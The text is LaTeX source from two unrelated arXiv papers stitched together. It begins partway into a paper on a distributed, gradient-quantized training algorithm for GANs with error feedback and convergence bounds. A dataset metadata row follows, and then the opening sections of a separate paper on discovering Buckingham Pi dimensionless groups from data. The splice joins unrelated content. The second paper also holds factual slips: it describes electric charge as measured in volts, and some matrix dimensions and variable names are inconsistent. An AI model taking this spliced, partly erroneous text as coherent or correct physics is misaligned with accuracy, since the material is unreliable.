\| Q\left(F(\mathbf{w})\right)-F(\mathbf{w}) \|^{2} \leq (1-\delta) \|F(\mathbf{w})\|^{2} \quad \text{for all} ~ \mathbf{w} \in \Omega.
\end{equation}
\label{definQ}
\end{defn}
\vskip -0.2in
Before sending gradient data to the central server, each worker needs quantify the gradient data, which makes our algorithm have a small communication overhead.
In addition, our algorithm is applicable to any gradient compression method that satisfies a general $\delta$-approximate compressor.
In general, the quantized gradient will lose some accuracy and cause the algorithm to fail to converge. In this paper, we have designed an error compensation operation to solve this problem, which is to incorporate the error made by the compression operator into the next step to compensate for gradients. Recently, Stich et al.~\cite{stich2018sparsified} conducted the theoretical analysis of error-feedback in the strongly convex case and Karimireddy et al.~\cite{karimireddy2019error} further extended the convergence results to the non-convex and weakly convex cases.
These error-feedback operations are designed to solve the minimization problem. Here, in order to solve the min-max problem, we need to design the error-feedback operation more cleverly. In each iteration, we compensate the error caused by gradient quantization twice.
The proposed method, named as {Distributed Quantized Generative Adversarial Networks (DQGAN)}, is summarized in Algorithm~\ref{alg:DQOSG}. The procedure of the new method is illustrated with the the parameter server model~\cite{li2014communication} in Figure~\ref{fig:framework}.
There are $M$ works participating in the model training.
In this method, $\mathbf{w}_{0}$ is first initialized and pushed to all workers, and the local variable $\mathbf{e}^{m}_{0}$ is set to $0$ for $m\in[1,M]$.
In each iteration, the state $\mathbf{w}_{t-1}^{(m)}$ is updated to obtain the intermediate state $\mathbf{w}_{t-\frac{1}{2}}^{(m)}$ on $m$-th worker. Then each worker computes the gradients and adds the error compensation. The $m$-th worker computes the gradients $F(\mathbf{w}_{t-\frac{1}{2}}^{(m)};\xi_{t}^{(m)})$ and adds the error compensation $\mathbf{e}^{(m)}_{t-1}$ to obtain $\mathbf{p}_{t}^{(m)}$, and then quantizes it to $\hat{\mathbf{p}}_{t}^{(m)}$ and transmit the quantized one to the server. The error $\mathbf{e}_{t}^{(m)}$ is computed as the difference between $\mathbf{p}_{t}^{(m)}$ and $\hat{\mathbf{p}}_{t}^{(m)}$. The server will average all quantized gradients and push it to all workers. Then the new parameter $\mathbf{w}_{t}$ will be updated.
Then we use it to update $\mathbf{w}_{t-1}$ to get the new parameter $\mathbf{w}_{t}$.
\begin{algorithm}[!h]
\caption{The Algorithm of {DQGAN}}
\begin{algorithmic}[1]
\REQUIRE {step-size $\eta>0$, Quantization function $Q\left(\cdot\right)$} is $\delta$-approximate compressor.
\STATE Initialize $\mathbf{w}_0$ and push it to all workers, set $\mathbf{w}^{(m)}_{-\frac{1}{2}} = \mathbf{w}_0$ and $\mathbf{e}^{(m)}_0=0$ for $1 \leq m \leq M$.
\FOR {$t = 1, 2, \ldots, T$}
\STATE {\textbf{on} worker m : $( m \in \{1, 2, \cdots, M\} )$}
\STATE {\quad set $\mathbf{w}_{t-\frac{1}{2}}^{(m)} = \mathbf{w}_{t-1} - \left[ \eta F(\mathbf{w}_{t-\frac{3}{2}}^{(m)};\xi_{t-1}^{(m)}) + \mathbf{e}^{(m)}_{t-1} \right]$}
\STATE {\quad compute gradient $F(\mathbf{w}_{t-\frac{1}{2}}^{(m)};\xi_{t}^{(m)})$}
\STATE {\quad set $\mathbf{p}_{t}^{(m)} = \eta F(\mathbf{w}_{t-\frac{1}{2}}^{(m)};\xi_{t}^{(m)}) + \mathbf{e}^{(m)}_{t-1} $}
\STATE {\quad set $\hat{\mathbf{p}}_{t}^{(m)} = Q\left( \mathbf{p}_{t}^{(m)} \right)$} and push it to the server
\STATE {\quad set $\mathbf{e}_{t}^{(m)} = \mathbf{p}_{t}^{(m)} - \hat{\mathbf{p}}_{t}^{(m)}$}
\STATE {\textbf{on} server:}
\STATE {\quad \textbf{pull} $\hat{\mathbf{p}}_{t}^{(m)}$ \textbf{from} each worker}
\STATE {\quad set $\hat{\mathbf{q}}_{t} = \frac{1}{M} \left[ \sum_{m=1}^{M} \hat{\mathbf{p}}_{t}^{(m)} \right]$}
\STATE {\quad \textbf{push} $\hat{\mathbf{q}}_{t}$ \textbf{to} each worker}
\STATE {\textbf{on} worker m : $( m \in \{1, 2, \cdots, M\} )$}
\STATE {\quad set $\mathbf{w}_{t} = \mathbf{w}_{t-1} - \hat{\mathbf{q}}_{t}$}
\ENDFOR
\STATE {Return $\mathbf{w}_{T}$}
\end{algorithmic}
\label{alg:DQOSG}
\end{algorithm}
\subsection{Coding Strategy}
The quantization plays an important role in our method. In this paper, we proposed a general $\delta$-approximate compressor in order to include a variety of quantization methods for our method. In this subsection, we will prove that some commonly-used quantization methods are $\delta$-approximate compressors.
According to the definition of the $k$-contraction operator~\cite{stich2018sparsified}, we can verify the following theorem
\begin{thm}
The $k$-contraction operator~\cite{stich2018sparsified} is a $\delta$-approximate compressor with $\delta=\frac{k}{d}$ where $d$ is the dimensions of input and $k\in(0,d]$ is a parameter.
\label{deltaOne}
\end{thm}
Moreover, we can prove the following theorem
\begin{thm}
The quantization methods in~\cite{alistarh2017qsgd} and~\cite{hou2018analysis} are $\delta$-approximate compressors.
\label{deltaTwo}
\end{thm}
Therefore, a variety of quantization methods can be used for our method.
\subsection{Convergence Analysis}
Throughout the paper, we make the following assumption
\begin{ass}[Lipschitz Continuous]
\begin{enumerate}
\item $F$ is $L$-Lipschitz continuous, i.e.
$\| F(\mathbf{w}_{1}) - F(\mathbf{w}_{2}) \| \leq L \| \mathbf{w}_{1} - \mathbf{w}_{2} \|$ for $\forall \mathbf{w}_{1}, \mathbf{w}_{2}$ .
\item $\| F(\mathbf{w}) \| \leq G$ for $\forall \mathbf{w}$ .
\end{enumerate}
\label{assum1}
\end{ass}
\begin{ass}[Unbiased and Bounded Variance]
For $\forall \mathbf{w}_{t-\frac{1}{2}}^{(m)}$, we have $\mathbb{E}\left[F(\mathbf{w}_{t-\frac{1}{2}}^{(m)};\xi_{t,b}^{(m)})\right] = F(\mathbf{w}_{t-\frac{1}{2}}^{(m)})$ and $\mathbb{E}\|F(\mathbf{w}_{t-\frac{1}{2}}^{(m)};\xi_{t,b}^{(m)}) - F(\mathbf{w}_{t-\frac{1}{2}}^{(m)})\|^2 \leq \sigma^2$ , where $1 \leq b \leq B$.
\label{assum2}
\end{ass}
\begin{ass}[Pseudomonotonicity]
The operator $F$ is pseudomonotone, i.e.,
$$\left\langle F(\mathbf{w}_{2}), \mathbf{w}_{1} - \mathbf{w}_{2} \right\rangle \geq 0 \Rightarrow \left\langle F(\mathbf{w}_{1}) , \mathbf{w}_{1} - \mathbf{w}_{2} \right\rangle \geq 0 \quad \text{for} \quad \forall \mathbf{w}_{1},\mathbf{w}_{2}$$
\label{assum3}
\end{ass}
Now, we give a key Lemma, which shows that the residual errors maintained in Algorithm~\ref{alg:DQOSG} do not accumulate too much.
\begin{lem}
At any iteration $t$ of Algorithm~\ref{alg:DQOSG}, the norm of the error $\frac{1}{M}\sum_{m=1}^{M}\| \mathbf{e}_{t}^{(m)} \|^{2}$ is bounded:
\begin{equation}
\mathbb{E} \left[ \| \frac{1}{M} \sum_{m=1}^{M} \mathbf{e}^{(m)}_{t} \|^2 \right]
\leq \frac{8\eta^2(1-\delta)(G^{2}+\frac{\sigma^2}{B})}{\delta^2}
\end{equation}
If $\delta = 1$, then $\|\mathbf{e}_{t}^{(m)}\|=0$ for $1 \leq m \leq M$ and the error is zero as expected.
\label{errorBounded}
\end{lem}
Finally, based on above assumptions and lemma, we are on the position to describe the convergence rate of Algorithm~\ref{alg:DQOSG}.
\begin{thm}
By picking the $\eta \leq \min \{ \frac{1}{\sqrt{BM}}, \frac{1}{6\sqrt{2}L} \}$ in Algorithm~\ref{alg:DQOSG}, we have
\begin{equation}
\begin{aligned}
\frac{1}{T} \sum_{t=1}^{T} \mathbb{E} & \left[ \| \frac{1}{M}\sum_{m=1}^{M} F\left(\mathbf{w}_{t-\frac{1}{2}}^{(m)};\xi_{t}^{(m)}\right) \|^2 \right]
\leq \frac{4 \| \tilde{\mathbf{w}}_{0} - \mathbf{w}^* \|^2}{\eta^{2} T} + \frac{1728~ L^2 \sigma^2}{B^2M^2} \\
& \quad + \frac{3456~ L^2 G^2 (M-1)}{BM^2} + \frac{9216~ L^2 (1-\delta)(G^{2}+\frac{\sigma^2}{B})(M-1)}{\delta^2 BM^2} + \frac{48~ \sigma^2}{BM}
\end{aligned}
\label{eq:converg}
\end{equation}
\label{converge}
\end{thm}
Theorem~\ref{converge} gives such a non-asymptotic convergence and linear speedup in theory.
We need to find the $\epsilon$-first-order stationary point, i.e.,
\begin{equation}
\mathbb{E} \left[ \| \frac{1}{M}\sum_{m=1}^{M} F\left(\mathbf{w}_{t-\frac{1}{2}}^{(m)};\xi_{t}^{(m)}\right) \|^2 \right] \leq \epsilon^{2}
\end{equation}
By taking $M=\mathcal{O}(\epsilon^{-2})$ and $T=\mathcal{O}(\epsilon^{-8})$,
we can guarantee that the algorithm~\ref{alg:DQOSG} can reach an $\epsilon$-first-order stationary point.
\section{Experiments}
\label{sec:experiments}
\begin{figure}[t]
\centerline{\includegraphics[width=\columnwidth]{Cifar10_is_fid.pdf}}
\caption{The Inception Score and Fr{\'e}chet Inception Distance values of three methods on the CIFAR10 dataset.}
\label{fig:results_cifa10}
\vspace{-0.4cm}
\end{figure}
\begin{figure}[t]
\centerline{\includegraphics[width=\columnwidth]{CelebA_is_fid.pdf}}
\caption{The Inception Score and Fr{\'e}chet Inception Distance values of three methods on the CelebA dataset.}
\label{fig:results_celeba}
\vspace{-0.4cm}
\end{figure}
\begin{figure}[t]
\centerline{\includegraphics[width=0.8\columnwidth]{speedup.pdf}}
\caption{The speedup of our method on the CIFAR10 and CelebA datasets (left and right respectively).}
\label{fig:speedup}
\vspace{-0.4cm}
\end{figure}
In this section, we present the experimental results on
real-life datasets. We used PyTorch~\cite{paszke2019pytorch} as the underlying deep learning framework
and Nvidia NCCL~\cite{nccl} as the communication mechanism.
We used the following two real-life benchmark datasets for the remaining experiments.
The \textbf{CIFAR-10} dataset~\cite{krizhevsky2009learning} contains 60000 32x32 images in 10 classes: airplane, automobile, bird, cat, deer, dog, frog, horse, ship and truck.
The \textbf{CelebA} dataset~\cite{liu2015faceattributes} is a large-scale face attributes dataset with more than 200K celebrity images, each with 40 attribute annotations.
We compared our method with the
{Centralized Parallel Optimistic Adam (CPOAdam)} which is our method without quantization and error-feedback,
and the Centralized Parallel Optimistic Adam with Gradients Quantization (CPOAdam-GQ)
for training the generative adversarial networks with the loss in (\ref{loss_gan1}) and
the deep convolutional generative adversarial network (DCGAN) architecture~\cite{radford2016unsupervised}.
We implemented full-precision (float32) baseline models and set the number of bits for our method to $8$.
We used the compressor in~\cite{hou2018analysis} for our method.
Learning rates and hyperparameters in these methods were chosen by an inspection of grid search results
so as to enable a fair comparison of these methods.
We use the Inception Score~\cite{salimans2016improved} and fr{\'e}chet inception distance~\cite{dowson1982frechet}
to evaluate all methods, where higher inception score and lower Fr{\'e}chet Inception Distance indicate better results.
The Inception Score and Fréchet Inception Distance values of three methods on the CIFAR10 and CelebA datasets
are shown in Figures~\ref{fig:results_cifa10} and \ref{fig:results_celeba}.
The results on both datasets show that the CPOAdam achieves high inception scores and
lower fr{\'e}chet inception distances with all epochs of training.
We also notice that our method with 1/4 full precision gradients is able to produce comparable result
with CPOAdam with full precision gradients,
finally with at most $0.6$ decrease in terms of Inception Score and
at most $30$ increase in terms of Fr{\'e}chet Inception Distance on the CIFAR10 dataset,
with at most $0.5$ decrease in terms of Inception Score and
at most $40$ increase in terms of Fr{\'e}chet Inception Distance on the CelebA dataset.
Finally, we show the speedup results of our method on the CIFAR10 and CelebA datasets in Figure~\ref{fig:speedup},
which shows that our method is able to improve the speedup of training GANs and
the improvement becomes more significant with the increase of data size.
With 32 workers, our method with $8$ bits of gradients
achieves a significant improvement
on the CIFAR10 and the CelebA dataset, compared to the CPOAdam.
This is the same as our expectations, after all, 8bit transmits less data than 32bit.
\section{Conclusion}
\label{sec:conclusions}
In this paper, we have proposed a distributed optimization algorithm for training GANs.
The new method reduces the communication cost via gradient compression,
and the error-feedback operations we designed is used to compensate for the bias caused
by the compression operation and ensure the non-asymptotic convergence.
We have theoretically proved the non-asymptotic convergence of the new method,
with the introduction of a general $\delta$-approximate compressor.
Moreover, we have proved that the new method has linear speedup in theory.
The experimental results show that our method is able to produce comparable results as the distributed OMD without quantization,
only with slight performance degradation.
Although our new method has linear speedup in theory,
the cost of gradients synchronization affects its performance in practice.
Introducing gradient asynchronous communication technology will break the synchronization barrier and
improve the efficiency of our method in real applications. We will leave this for the future work.
| 2024-02-18T23:40:01.853Z | 2020-10-27T01:34:27.000Z | algebraic_stack_train_0000 | 1,132 | 5,256 |
|
proofpile-arXiv_065-5623 | \section{Introduction}
Dimensional analysis is based on the simple idea that physical laws do not depend on the units of measurements.
As a consequence, any function that expresses a physical law has the fundamental property of so-called {\em generalized homogeneity}~\cite{barenblatt1996scaling} and does not depend on the observer.
Although such concepts of dimensional analysis go back to the time of Newton and Galileo~\cite{sterrett2017physically}, it was formalized mathematically by the pioneering contributions of Edgar Buckingham in 1914~\cite{buckingham1914physically}.
Specifically, Buckingham proposed a principled method for extracting the most general form of physical equations by simple dimensional considerations of the seven fundamental units of measurement: length (meter), mass (kg), time (seconds), electric current (Ampere), temperature (Kelvin), amount of substance (mole), and luminous intensity (candela).
From electromagnetism to gravitation, measurements can be directly related to the seven fundamental units, i.e. force is measured in Newtons which is kg$\cdot$m/s$^2$ and electric charge by the volt which is kg$\cdot$m$^2$/(s$^3$$\cdot$A).
The resulting Buckingham Pi theorem was originally contextualized in terms of physically similar systems~\cite{buckingham1914physically}, or groups of parameters that related similar physics.
In modern times, rapid advancements in measurement and sensor technologies have produced data of diverse quantities at almost any spatial and temporal scale.
This has engendered a renewed consideration of the Buckingham Pi theorem in the context of data-driven modeling~\cite{del2019lurking,jofre2020data,fukami2021robust,xie2021data}.
Specifically, as shown here, physics-informed machine learning algorithms can be constructed to automate the principled approach advocated by Buckingham for the discovery of the most general and parsimonious form of physical equations possible from measurements alone.
Buckingham Pi theory was critically important in the pre-computer era. Indeed, the discovery of key dimensionless quantities was considered a fundamental result, as it often uncovered the self-similarity structure of the solution along with parametric dependencies and symmetries. In fluid dynamics alone, for instance, there are numerous named dimensionless parameters that are discovered through the Buckingham Pi reduction, including the Reynolds, Prandtl, Froude, Weber, and Mach numbers.
Scaling and dimensional analysis continue to provide a robust starting point for understanding both complex and basic physical phenomena, like the physics of wrinkling~\cite{Cerda2003prl}, chaotic patterns in Rayleigh-B\'enard convection~\cite{Morris1993prl}, the structure of drops falling from a faucet \cite{Shi1994science}, spontaneous pattern formation by self-assembly~\cite{Grzybowski2000nature}, and osmotic spreading of biofilms~\cite{Seminara2012pnas}.
In practice, many dimensionless groups naturally arise from ratios of domain averaged terms in physically meaningful equations that are required to be dimensionally homogeneous. When equations are non-dimensionalized, dimensionless terms that are small on average relative to others can be treated as perturbations, thus providing insights into the qualitative structure of the solution and simplifying the problem of finding it. More importantly, Buckingham Pi provides the potential for an {\em order parameter} description~\cite{Cross1993} that determines the qualitative structure of the solution and its bifurcations without recourse to the full-state equations~\cite{callaham2021learning}.
These order parameters form the basis for casting problems into normal forms that reveal physical symmetries and can potentially be solved analytically~\cite{guckenheimer_holmes, Yair2017pnas, kalia2021learning}.
Even when governing equations are unknown, Buckingham Pi establishes a dimensionally consistent relationship between the input parameters/variables and output predictions which help constrain models and prevent over-fitting.
The rise of scientific computing in the 1980s made it possible to numerically integrate highly nonlinear ordinary and partial differential equations, without the need for analytic simplifications provided by dimensional analysis.
More recently, machine learning algorithms have shown promise in discovering scientific laws~\cite{schmidt2009distilling}, differential equations~\cite{brunton2016discovering, rudy2017data, lu2021learning}, and deep network input-output function approximations~\cite{raissi2019physics, karniadakis2021physics, Noe2019science} from simulation and experimental data alone, with considerable progress in the field of fluid mechanics~\cite{Brenner2019prf,Duraisamy2019arfm,Brunton2020arfm,Sonnewald2021}.
Particularly, unsupervised learning techniques have recently made significant progress in distilling physical data into interpretable dynamical models that automate the scientific process \cite{Kaiser2021, Sonnewald2019ess, wu2018deep, Champion2019pnas, bakarji2022discovering}.
However, these methods do not take into account the units of their training data, which can significantly constrain the hypothesis class to physically meaningful solutions.
{Principal component analysis} (PCA), which is a leading data analysis method~\cite{Brunton2019book}, attempts to circumvent the idea that physical laws do not depend on the units of measurements by taking each measurement variable and setting its mean to zero and its variance to unity.
However, there are more sophisticated methods for explicitly considering measurement units.
Active subspaces provides a principled algorithmic method for extracting dimensionless numbers from experimental and simulation data~\cite{constantine2017data}, having successfully been demonstrated to discover dimensionless numbers in particle-laden turbulent flows~\cite{jofre2020data}.
In a related line of work, statistical null-hypothesis testing has been used alongside the Buckingham Pi theorem to find hidden variables in dimensional experimental data~\cite{del2019lurking}.
Dimensional analysis has also been used for a physics-inspired symbolic regression algorithm that discovers physics formulas from data~\cite{udrescu2020ai} and to improve neural network models~\cite{gunaratnam2003improving}.
Data-driven dimensional analysis has also been applied to model turbulence data~\cite{fukami2021robust}.
Machine learning algorithms that use sparse identification of differential equation to discover dimensionless groups and scaling laws that best collapse experimental data have also been recently proposed~\cite{xie2021data}.
In this study, we address the problem of automatic discovery of dimensionless groups from available experimental or simulation data using the Buckingham Pi theorem as a constraint.
Importantly, although the Buckingham Pi theorem provides a step-by-step method for finding dimensionless groups directly from the input variables and parameters, its solution is not unique.
Thus it relies on intuition and experience with the physical problem at hand.
If the underlying equations are available, finding dimensionless groups is constrained by the form of the equation and they are computed by dividing the \emph{system average} magnitude of every term by a reference term.
Even then, the problem of determining the relevant dimensionless numbers depends on experience.
Our aim is to leverage symmetries in the data to inform the algorithm of which set of dimensionless groups control the behavior (e.g. the Reynolds number controls the turbulence of a flow-field).
We develop three methods that find the most physically meaningful Pi groups (See Fig.~\ref{fig:approaches}), assumed to be the most predictive of the dependent variables.
The first method is a constrained optimization that fits independent variable and parameter inputs to predictions, while satisfying the Buckinham Pi theorem as a hard constraint.
The second method uses a Buckingham Pi (nullspace) constraint on the first hidden layer of a deep network that fits input parameters to output predictions.
And the third method uses SINDy~\cite{brunton2016discovering, rudy2017data} to constrain available dimensionless groups to be coefficients in a sparse differential equation.
The latter method has the added benefit of discovering a parametric (dimensionless) differential equation that describes the data, thus simultaneously generalizing the SINDy method.
We apply these methods to three problems: the rotating hoop, the Blasius boundary layer, and the Rayleigh-B\'ernard problem.
\begin{figure}[t]
\begin{center}
\includegraphics[width=.85\textwidth]{figures/approaches2.pdf}
\caption{Two approaches for non-dimensionalization. In the absence of known governing equations, scientists use the Buckingham Pi theorem to infer dimensionless groups $\bm \pi_{\tilde{\mathbf p}}$ from units of input variables and parameters. When the equation is known, normalizing variables and parameters by system-specific constants and/or averages gives rise to dimensionless groups as equation coefficients.}
\label{fig:approaches}
\end{center}
\end{figure}
\section{Buckingham Pi Problem Formulation}\label{sec:problem-statement}
Let $\mathbf{q}= f(\mathbf p)$ be a mapping where $\mathbf p \in \mathbb R^n$ is a vector of input measurement parameters and variables, and $f$ is a function that maps $\mathbf p$ to a set of dependent quantities of interest $\mathbf{q} \in \mathbb R^k$. One generally seeks a predictor $f$ that maximizes the size of the set of possible measurable parameters and variables $\mathcal P$, for which the prediction error $\varepsilon = \| f(\mathbf p) - \mathbf{q} \|$ is minimized, with $\mathbf p, \mathbf q \in \mathcal P$. The function $f$ is typically the solution of an initial and/or boundary value problem with known variables and parameters $\mathbf p$ and unknown solution $\mathbf{q}$, all of which have physical dimensions [units].
The Buckingham Pi theorem states that there exists a set of dimensionless quantities $\bm \pi = (\bm \pi_p, \bm \pi_q)$, also known as $\bm \pi-$groups, such that the dimensionless input parameters/variables $\bm \pi_p \in \mathbb R^{n'}$ span the full dimensionless solution space $\bm \pi_q \in \mathbb R^{k'}$, with $n' \le n$ and $k' \le k$~\cite{buckingham1914physically}. Furthermore, the theorem determines the value of $d' = n'+k' $ given the units of the measurement variables and parameters.
A probabilistic corollary of the Buckingham Pi theorem is that the input-output data $(\mathbf p, \mathbf q)$ can be projected on a lower dimensional space with basis $(\bm \pi_p, \bm \pi_q)$ without compromising the prediction error $\varepsilon$, such that,
\begin{equation}
\left\| \mathbf{q} - f(\mathbf p) \right\| < \varepsilon \quad \rightarrow \quad \left\| \bm \pi_q - \psi(\bm \pi_p) \right\| < \varepsilon,
\end{equation}
where $\psi$ is an unknown function that can be approximated from available data.
However, the Buckingham Pi theorem does not provide any information on the properties of $\psi$ or its relationship with the Pi groups. The theorem generally assumes $\mathbf p$, $\mathbf q$, and $f$ to be deterministic without considering the optimality of a dimensionless basis with the generalization properties of the mapping $f$.
In a data-driven statistical setting, we assume that the inputs $\mathbf p$ and outputs $\mathbf q$ are sampled from a distribution function $F_{\mathbf p \mathbf q}(P, Q)$, and that $f$ is an optimal mapping in a given class of function. In this context, we generally seek the most physically meaningful transformation $(\mathbf{p}, \mathbf q) \rightarrow (\bm \pi_p, \bm \pi_q)$ that provides the best fit $\bm \pi_q = \psi(\bm \pi_p)$, assuming $\psi$ to be an optimal predictor over an pre-determined hypothesis class $\mathcal H$. Accordingly, we posit the following hypothesis
\begin{hypothesis}\label{main-hyp}
Given a set of input and output measurement pairs $\tilde{\mathbf p} = (\mathbf p, \mathbf q)$, the most physically meaningful dimensionless basis $\bm \pi^*$ is the optimal coordinate transformation $\tilde{\mathbf p} \rightarrow \bm \pi^*$ that satisfies the minimization problem
\begin{equation}\label{eq:optim-thrm}
\bm \pi^* = \underset{\bm \pi}{\argmin} \left( \underset{\psi}{\min} \left\| \bm \pi_q - \psi(\bm \pi_p)\right\|^2_2 \right),
\end{equation}
where \emph{physical meaningfulness} is defined as the dimensionless group's ability to simplify an equation in relevant regimes and provide a scaling that collapses the input-output solution space to a lower dimension.
\end{hypothesis}
Note that defining \emph{physical meaningfulness} often depends on the historical and scientific context, which makes the above hypothesis subject to interpretation. In some cases, theoretical and experimental tradition narrows a field of study down to a set of well-known dimensionless numbers with which known regimes and behaviors are associated (e.g. Reynolds number quantifying turbulence in fluid mechanics). Particularly, when analytical models and equations are available, dimensionless numbers that arise naturally from the relative measure of different terms are physically significant because they quantify changes in the qualitative nature of the solution. Hypothesis~\ref{main-hyp} proposes a new approach for defining \emph{physical meaningfulness} by first providing evidence for its validity in Sec.\ref{sec:methods}. The purpose of the proposed methods is to discover dimensionless groups in contexts where data is available but analytical models are not known.
This hypothesis is further constrained by the functional relationship between $\bm \pi$ and $\bm \tilde{\mathbf p}$ given by
\begin{equation}\label{eq:ptopi}
\pi_j = \prod_{i=1}^{d} \tilde{p}_i^{\Phi_{ij}},
\end{equation}
where $\Phi_{ij}$ are unknown parameters that are chosen to make $\pi_j$ dimensionless.
Let $\Omega()$ be a function that maps a measurable quantity $\tilde p_i$ to a vector containing the powers of its basic dimensions (i.e. mass $M$, length $L$, time $T$, etc.). For example, if one chooses $[M, L, T]$ as the basic dimensions, then the units of a force are $[F] = ML/T^2$, and $\Omega(F) = [1, 1, -2]^T$. Let $\phi()$ be a function that maps a dimensionless group to a vector that corresponds to the powers of the input parameters $\mathbf p$ such that $\phi(\pi_j) = [\Phi_{1j}, \Phi_{2j}, \ldots, \Phi_{dj}]^T$, where $d=n+k$.
The Buckingham Pi theorem~\cite{buckingham1914physically} constrains $\phi(\pi_i)$ to be in the null-space of the units matrix
\begin{equation}
\bm D = [\bm D_p, \bm D_q] =
\left[
\begin{array}{ccccccc}
\rule[-1ex]{0.5pt}{2.5ex} & \rule[-1ex]{0.5pt}{2.5ex} & & \rule[-1ex]{0.5pt}{2.5ex} & \rule[-1ex]{0.5pt}{2.5ex} & & \rule[-1ex]{0.5pt}{2.5ex} \\
\Omega( p_1) & \Omega( p_2) & \ldots & \Omega( p_n) & \Omega( q_1) & \ldots & \Omega( q_k) \\
\rule[-1ex]{0.5pt}{2.5ex} & \rule[-1ex]{0.5pt}{2.5ex} & & \rule[-1ex]{0.5pt}{2.5ex} & \rule[-1ex]{0.5pt}{2.5ex} & & \rule[-1ex]{0.5pt}{2.5ex}
\end{array}
\right],
\end{equation}
such that
\begin{equation}\label{eq:nulleqn}
\bm D \phi(\pi_i) = \mathbf 0, \quad \forall i \in \{1,\ldots, d\}.
\end{equation}
Here, we assume that the number of dimensional and dimensionless predictions are equal, i.e. $|\bm \pi_q| = |\mathbf q| = k$, which is often the case, and we later propose methods for relaxing this assumption.
The Buckingham Pi theorem determines the number of Pi-groups to be $d' = d - \text{rank}(\bm D)$. The main shortcoming of the theorem is its inability to provide a unique set of $d'$ dimensionless numbers. In practice, additional heuristic constraints are required to solve for the unknowns $s_{ij}$.
\section{Methods}
\label{sec:methods}
We present three methods for discovering dimensionless groups from data. The main features that differentiate them are
\begin{enumerate}
\item Imposing hard, soft, or no constraints on the null-space of $\bm D$ to ensure that the Pi-groups are dimensionless according to equation~\eqref{eq:nulleqn}.
\item The type of input-output function approximation $\psi$: e.g. neural network, non-parametric function, or differential equation.
\end{enumerate}
Let $\{\tilde{\mathbf{p}}^{(i)}\}_{i=1}^m \equiv \{(\mathbf p^{(i)}, \mathbf q^{(i)})\}_{i=1}^m$ be a set of $m$ measurement pairs of the inputs vector $\mathbf p^{(i)} \in {\mathbb R}^n$ and their corresponding output predictions $\mathbf q^{(i)} \in {\mathbb R}^k$, with index $i$.
We define the input parameter matrix $\boldsymbol{P} \in {\mathbb R}^{m \times n}$ and the output prediction matrix $\boldsymbol{Q} \in {\mathbb R}^{m \times k}$ as the row-wise concatenation of all measurements $\mathbf p^{{(i)}}$ and $\mathbf q^{{(i)}}$ respectively. We also define $\tilde{\boldsymbol{P}} = [\bm P, \bm Q] \in {\mathbb R}^{m \times d}$ as the column-wise concatenation of $\boldsymbol{P}$ and $\boldsymbol{Q}$.
The Pi-groups powers matrix is given by
\begin{equation}
\bm \Phi =
\left[
\begin{array}{cccc}
\rule[-1ex]{0.5pt}{2.5ex} & \rule[-1ex]{0.5pt}{2.5ex} & & \rule[-1ex]{0.5pt}{2.5ex} \\
\phi(\pi_1) & \phi(\pi_2) & \ldots & \phi(\pi_{d'}) \\
\rule[-1ex]{0.5pt}{2.5ex} & \rule[-1ex]{0.5pt}{2.5ex} & & \rule[-1ex]{0.5pt}{2.5ex}
\end{array}
\right] \in {\mathbb R}^{d \times {d'}},
\end{equation}
such the equation $\bm D \bm \Phi = \mathbf{0}$ is satisfied according to Eq.\eqref{eq:nulleqn}. Similarly, we define $\bm \Phi_p \in {\mathbb R}^{n\times n'}$ to contain the $n'$ dimensionless groups corresponding to the $n$ input parameters/variables $\mathbf p$. Equation~\eqref{eq:ptopi} can be written as $\pi_i = \exp \left\{ \sum_{j=1}^d \Phi_{ij}\log(\tilde p_j) \right\}$, corresponding to the matrix form
\begin{equation}\label{eq:ptopi-mat}
\boldsymbol{\Pi} = \exp \left( \log(\boldsymbol{\tilde{P}}) \boldsymbol{\Phi} \right),
\end{equation}
where each row in $\boldsymbol{\Pi} \in \mathbb R^{m\times d'}$ corresponds to the values of the dimensionless groups $\bm \pi^{(i)}$ for a given experiment $i$, and the exponential and logarithm are both taken element-wise. We also define the matrix $\bm \Pi_q \in {\mathbb R}^{m \times k'}$ to be the data matrix of the output Pi-groups $\bm \pi_q$ and $\bm \Pi_p \in {\mathbb R}^{m \times n'}$ to be the data matrix of the input Pi-groups $\bm \pi_p$, such that $\bm \Pi = [\bm \Pi_p, \bm \Pi_q]$.
For example, consider the pendulum shown in Fig.~\ref{fig:approaches}.
If we define the inputs to be gravity $g$, mass $m$, length $L$, and time $t$, and the output to be the angle $\alpha$, then the dimensional input and output parameter vectors $\mathbf p$ and $\mathbf q$ are
\begin{equation}
\mathbf p =
\begin{bmatrix}
g & m & L & t
\end{bmatrix}^T, \qquad
\mathbf q =
\begin{bmatrix} \alpha \end{bmatrix}.
\end{equation}
The corresponding units matrices $\bm D_p$ and $\bm D_q$ constructed with basic dimensions mass, length, and time are
\begin{subequations}
\begin{align}
\bm D_p &=
\left[
\begin{array}{ccccc}
\rule[-1ex]{0.5pt}{2.5ex} & \rule[-1ex]{0.5pt}{2.5ex} & \rule[-1ex]{0.5pt}{2.5ex} & \rule[-1ex]{0.5pt}{2.5ex} \\
\Omega( g ) & \Omega( m ) & \Omega( L ) & \Omega( t ) \\
\rule[-1ex]{0.5pt}{2.5ex} & \rule[-1ex]{0.5pt}{2.5ex} & \rule[-1ex]{0.5pt}{2.5ex} & \rule[-1ex]{0.5pt}{2.5ex}
\end{array}
\right]
= \left[
\begin{array}{ccccc}
0 & 1 & 0 & 0 \\
1 & 0 & 1 & 0 \\
-2 & 0 & 0 & 1
\end{array}
\right] \\
\bm D_q &= \left[
\begin{array}{c}
\rule[-1ex]{0.5pt}{2.5ex} \\
\Omega(\alpha) \\
\rule[-1ex]{0.5pt}{2.5ex}
\end{array}
\right] = \left[
\begin{array}{c}
0 \\
0 \\
0
\end{array}
\right].
\end{align}
\end{subequations}
Note that the angle $\alpha$ is already dimensionless, so $\Omega(\alpha)$ is the zero vector.
A possible $\bm \Phi$ matrix consisting of columns spanning the nullspace of $\bm D = [\bm D_p, \bm D_q]$ is
\begin{equation}
\bm \Phi = \left[
\begin{array}{cc}
1 & 0 \\
0 & 0 \\
-1 & 0 \\
2 & 0 \\
0 & 1
\end{array}
\right]
\quad
\text{s.t.}
\quad
\bm \Phi_p = \left[
\begin{array}{c}
1 \\
0 \\
-1 \\
2 \\
0
\end{array}
\right],
\quad
\bm \Phi_q = \left[
\begin{array}{c}
0 \\
0 \\
0 \\
0 \\
1
\end{array}
\right].
\end{equation}
Then $\pi_q = \alpha$ and $\pi_p = gt^2/L$, so that the input/output relationship is some function $\alpha = \psi(gt^2/L)$. We solve this example using a data-driven method in Sec.~\ref{sec:results-pendulum}.
